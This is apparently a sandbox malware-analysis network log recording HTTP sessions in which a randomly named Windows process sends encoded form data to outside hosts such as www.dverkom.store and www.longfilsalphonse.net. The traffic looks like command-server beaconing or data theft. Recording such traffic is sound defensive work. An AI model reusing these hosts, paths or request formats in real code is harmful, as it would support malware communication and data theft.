                                                                                                                    20192.168.2.549732162.0.238.246804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:21.659895897 CEST471OUTGET /dbbh/?FbuX5DnP=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:22.256741047 CEST610INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:22 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.54973331.31.196.17804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:27.396368027 CEST734OUTPOST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 6f 32 31 68 69 61 6f 68 56 37 57 2f 6f 2b 2b 53 52 4b 63 31 4f 31 31 50 36 59 64 61 55 68 70 37 44 2f 43 65 45 6a 48 54 52 2f 52 61 63 51 37 59 6b 6e 53 72 4a 6a 53 6d 67 70 78 55 5a 79 59 58 46 79 30 6a 54 4b 59 6f 6c 50 56 74 36 78 50 76 46 55 31 69 51 59 6d 58 75 50 4c 42 76 45 44 52 6a 64 45 33 73 35 6f 48 39 56 67 52 50 4e 41 53 49 68 2b 34 37 79 73 50 36 72 45 76 36 32 6a 62 53 6f 52 44 58 6d 54 58 68 33 78 76 50 66 55 30 34 41 4b 4b 36 66 33 30 6a 6b 43 73 6b 41 54 78 2b 30 69 31 31 33 39 59 67 6e 6a 39 2f 71 38 73 35 4e 49 6a 76 72 35 67 71 30 59 3d
                                                                                                                    Data Ascii: FbuX5DnP=1XFCr+0Ft2zXo21hiaohV7W/o++SRKc1O11P6YdaUhp7D/CeEjHTR/RacQ7YknSrJjSmgpxUZyYXFy0jTKYolPVt6xPvFU1iQYmXuPLBvEDRjdE3s5oH9VgRPNASIh+47ysP6rEv62jbSoRDXmTXh3xvPfU04AKK6f30jkCskATx+0i1139Ygnj9/q8s5NIjvr5gq0Y=
                                                                                                                    Sep 30, 2024 19:58:28.107503891 CEST375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:28 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.54973431.31.196.17804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:29.939858913 CEST754OUTPOST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 70 58 46 68 6b 35 41 68 54 62 57 2b 72 2b 2b 53 65 71 63 50 4f 30 4a 50 36 64 39 4b 42 45 35 37 44 66 79 65 46 69 48 54 57 2f 52 61 4a 67 37 5a 36 58 53 67 4a 6a 65 41 67 6f 64 55 5a 7a 38 58 46 33 51 6a 51 39 4e 2b 6b 66 56 76 6d 78 50 74 4c 30 31 69 51 59 6d 58 75 50 50 72 76 41 58 52 6a 74 55 33 73 59 6f 45 6a 46 67 51 49 4e 41 53 4d 68 2b 38 37 79 73 70 36 71 49 52 36 31 62 62 53 70 68 44 58 33 54 55 76 33 78 70 46 2f 56 6e 72 53 33 50 77 4a 6a 42 6f 6b 37 57 37 7a 2f 75 32 69 50 66 76 56 31 77 7a 48 50 46 76 35 30 62 6f 39 70 4b 31 49 70 51 30 6a 4e 35 4b 63 61 4b 57 56 6b 63 79 67 35 5a 46 72 58 61 30 61 69 30
                                                                                                                    Data Ascii: FbuX5DnP=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBE57DfyeFiHTW/RaJg7Z6XSgJjeAgodUZz8XF3QjQ9N+kfVvmxPtL01iQYmXuPPrvAXRjtU3sYoEjFgQINASMh+87ysp6qIR61bbSphDX3TUv3xpF/VnrS3PwJjBok7W7z/u2iPfvV1wzHPFv50bo9pK1IpQ0jN5KcaKWVkcyg5ZFrXa0ai0
                                                                                                                    Sep 30, 2024 19:58:30.695768118 CEST375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:30 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.54973531.31.196.17804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:32.486839056 CEST1771OUTPOST /fbcx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.dverkom.store
                                                                                                                    Origin: http://www.dverkom.store
                                                                                                                    Referer: http://www.dverkom.store/fbcx/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 31 58 46 43 72 2b 30 46 74 32 7a 58 70 58 46 68 6b 35 41 68 54 62 57 2b 72 2b 2b 53 65 71 63 50 4f 30 4a 50 36 64 39 4b 42 45 78 37 44 4d 36 65 45 42 66 54 58 2f 52 61 56 77 37 55 36 58 53 39 4a 67 75 4d 67 6f 67 68 5a 78 30 58 4b 31 59 6a 59 73 4e 2b 75 66 56 76 74 52 50 73 46 55 31 33 51 5a 57 62 75 50 66 72 76 41 58 52 6a 72 59 33 6c 70 6f 45 68 46 67 52 50 4e 41 4f 49 68 2b 45 37 32 35 63 36 71 4e 6b 35 45 37 62 56 4a 78 44 52 46 72 55 6e 33 78 72 47 2f 55 67 72 53 37 45 77 4e 44 37 6f 6b 50 73 37 77 66 75 6e 6c 37 44 38 6b 42 79 6c 56 66 6b 6f 37 6b 6e 36 72 39 36 32 70 4e 62 70 54 35 39 4c 50 43 71 57 67 63 4f 7a 45 77 74 51 50 2f 75 33 61 62 2b 37 51 46 37 51 33 61 78 67 67 38 4e 6d 51 42 31 55 4e 4e 63 51 53 67 74 2f 78 71 70 2f 32 33 64 6d 37 63 78 71 30 74 72 61 5a 41 5a 6b 74 76 6d 50 32 6b 73 49 30 64 2b 38 4d 31 37 73 66 35 6f 56 46 75 6b 45 32 37 34 32 4e 4b 73 70 6d 34 6f 72 4d 57 37 56 43 54 42 34 66 32 6c 52 46 33 63 44 46 33 6d 53 42 54 45 4c 48 53 37 73 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=1XFCr+0Ft2zXpXFhk5AhTbW+r++SeqcPO0JP6d9KBEx7DM6eEBfTX/RaVw7U6XS9JguMgoghZx0XK1YjYsN+ufVvtRPsFU13QZWbuPfrvAXRjrY3lpoEhFgRPNAOIh+E725c6qNk5E7bVJxDRFrUn3xrG/UgrS7EwND7okPs7wfunl7D8kBylVfko7kn6r962pNbpT59LPCqWgcOzEwtQP/u3ab+7QF7Q3axgg8NmQB1UNNcQSgt/xqp/23dm7cxq0traZAZktvmP2ksI0d+8M17sf5oVFukE2742NKspm4orMW7VCTB4f2lRF3cDF3mSBTELHS7szmf+ARguo2TcKXEa25EV2EZ6rAP6MB4fcBz7KMMNB0fj7hF0OBrtAW8iw5kNArdHlw3umTrlUJCvNSSr0JKGHgnIVTwge6XKKoYYpilMQegoO4Z+rc3lF8hzgxSC7/GVma+y182dBDDzFzrSnsLirXM7aJKI9Lm5h9XInGtHLDkcbguyo9AZwGpT1IqNXGgMWhem/zKzcMib6OsmpMdNRkeIzqrvgGEbwzBV6QylDzxUdXMYj9DhjPZ5E3K1TpzgGrl6TchhRcbbCOLxgtjKMmpFUDjxi/sq/dxqvQWcPi1c6hlJBrTZOfdZhoL+Zuxu0y3bSrUiOxCcjCbXuomzi+sBKU0xWnS80caNf8K81XI9qYoClPtFk5u5WY96ixYkuikUR3ZC7gE6pBQsviOPqrMbgQCo0q/+jymR+qRd+ytS9IcoWOJFcW+L5/psrgaJxY37xSCqrahBO9zJKosJ44ZH3Fgp0Nae9BkqbOneNoZKWmq4jyJfoaEyfelo/ItqVcD9PJEAQ0/ZfWmZA3jvZBLCyqd+JakzGiW36f2gVeIsrrUcm2nBFiQjsXIXkZxaNO5SNxoXU92WHCi0PD5d6dLzR+LkaXdVHoL8c2w2L8UGnpT15qphhXbemFRIsfaL4TIGBGxXtLr9vlUk868WsvrjL1HWsPGhUr [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:58:33.170191050 CEST375INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:33 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    24192.168.2.54973631.31.196.17804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:35.033844948 CEST474OUTGET /fbcx/?FbuX5DnP=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.dverkom.store
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:35.786484003 CEST733INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:35 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.54973752.223.13.41804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:41.173870087 CEST755OUTPOST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 4b 58 58 46 67 78 38 43 4e 52 54 4a 45 4a 5a 69 45 7a 4b 4e 68 78 47 4d 78 38 55 38 72 52 65 58 50 6d 7a 4e 70 56 74 59 39 59 68 74 31 57 49 68 78 6b 6f 47 71 6b 69 79 69 38 42 30 5a 36 42 6a 73 67 4b 59 6c 46 4c 79 35 4a 4f 34 2f 4d 57 4e 49 6c 65 41 62 38 59 54 66 7a 6f 51 45 6a 6d 4e 75 44 39 6a 74 72 50 7a 37 6f 54 31 59 51 55 51 67 55 78 6f 59 36 79 51 42 55 73 75 55 75 69 46 6d 7a 4d 39 42 69 6a 6d 76 2f 72 51 4f 52 34 53 63 63 71 50 6d 38 58 2b 77 68 65 6b 6b 77 4e 48 79 5a 6c 4f 79 79 79 67 58 49 59 65 44 4e 4c 2f 2b 33 64 4b 70 39 6a 5a 4b 39 37 6b 73 41 74 35 78 49 39 5a 6e 5a 6f 3d
                                                                                                                    Data Ascii: FbuX5DnP=KXXFgx8CNRTJEJZiEzKNhxGMx8U8rReXPmzNpVtY9Yht1WIhxkoGqkiyi8B0Z6BjsgKYlFLy5JO4/MWNIleAb8YTfzoQEjmNuD9jtrPz7oT1YQUQgUxoY6yQBUsuUuiFmzM9Bijmv/rQOR4SccqPm8X+whekkwNHyZlOyyygXIYeDNL/+3dKp9jZK97ksAt5xI9ZnZo=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.54973852.223.13.41804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:43.725866079 CEST775OUTPOST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 4b 58 58 46 67 78 38 43 4e 52 54 4a 47 70 4a 69 48 51 69 4e 6b 52 47 4e 39 63 55 38 68 78 66 51 50 6d 2f 4e 70 55 5a 79 39 4b 56 74 30 30 51 68 77 6c 6f 47 74 6b 69 79 33 4d 42 78 64 36 41 4f 73 67 48 6e 6c 41 7a 79 35 50 69 34 2f 4a 79 4e 4a 55 65 44 62 73 59 52 53 54 6f 53 4b 44 6d 4e 75 44 39 6a 74 76 76 4a 37 6f 62 31 59 6a 63 51 6d 31 78 6e 47 4b 79 52 47 55 73 75 51 75 69 42 6d 7a 4e 4e 42 6d 6a 41 76 39 54 51 4f 51 6b 53 59 65 43 4f 2f 4d 58 34 2b 42 66 33 70 31 51 33 7a 61 4e 62 2f 43 7a 44 4d 35 51 54 4c 62 6d 56 6b 56 56 69 36 64 50 68 61 75 7a 54 39 77 4d 51 72 72 74 70 35 4f 39 4e 78 69 48 63 6f 71 69 33 50 65 4b 41 35 63 53 67 7a 4c 72 59
                                                                                                                    Data Ascii: FbuX5DnP=KXXFgx8CNRTJGpJiHQiNkRGN9cU8hxfQPm/NpUZy9KVt00QhwloGtkiy3MBxd6AOsgHnlAzy5Pi4/JyNJUeDbsYRSToSKDmNuD9jtvvJ7ob1YjcQm1xnGKyRGUsuQuiBmzNNBmjAv9TQOQkSYeCO/MX4+Bf3p1Q3zaNb/CzDM5QTLbmVkVVi6dPhauzT9wMQrrtp5O9NxiHcoqi3PeKA5cSgzLrY


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.54973952.223.13.41804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:46.270384073 CEST1792OUTPOST /iq05/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.longfilsalphonse.net
                                                                                                                    Origin: http://www.longfilsalphonse.net
                                                                                                                    Referer: http://www.longfilsalphonse.net/iq05/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 4b 58 58 46 67 78 38 43 4e 52 54 4a 47 70 4a 69 48 51 69 4e 6b 52 47 4e 39 63 55 38 68 78 66 51 50 6d 2f 4e 70 55 5a 79 39 4b 74 74 30 42 4d 68 78 47 51 47 73 6b 69 79 32 4d 42 77 64 36 42 4d 73 67 65 75 6c 41 50 49 35 4d 57 34 2f 71 4b 4e 59 58 47 44 56 73 59 52 4e 44 6f 54 45 6a 6d 63 75 44 74 6e 74 72 4c 4a 37 6f 62 31 59 6b 73 51 68 6b 78 6e 45 4b 79 51 42 55 73 59 55 75 69 70 6d 7a 55 31 42 6d 75 37 76 70 6e 51 50 30 45 53 65 39 71 4f 67 38 58 36 39 42 65 77 70 31 55 6f 7a 62 68 58 2f 42 76 70 4d 2b 55 54 62 39 7a 2f 6e 33 68 47 74 2b 4f 47 4a 4f 4c 78 74 6b 77 56 68 72 68 69 7a 63 56 72 2f 68 37 38 76 65 44 33 4d 39 62 36 36 4e 65 75 69 37 47 4b 6b 63 66 38 79 6a 2f 72 6f 45 62 56 35 55 77 74 66 31 66 4f 69 63 6c 57 75 50 70 74 46 71 73 4c 38 37 4f 35 39 33 48 35 57 33 54 56 53 66 39 53 72 7a 4f 44 35 31 4c 73 46 75 4c 62 69 77 7a 47 2b 54 45 6c 69 6d 39 6d 49 58 4e 79 78 51 51 68 42 73 5a 73 6f 44 68 30 72 57 7a 30 71 30 79 75 46 6a 41 72 5a 32 36 30 4f 72 6e 44 51 [TRUNCATED]
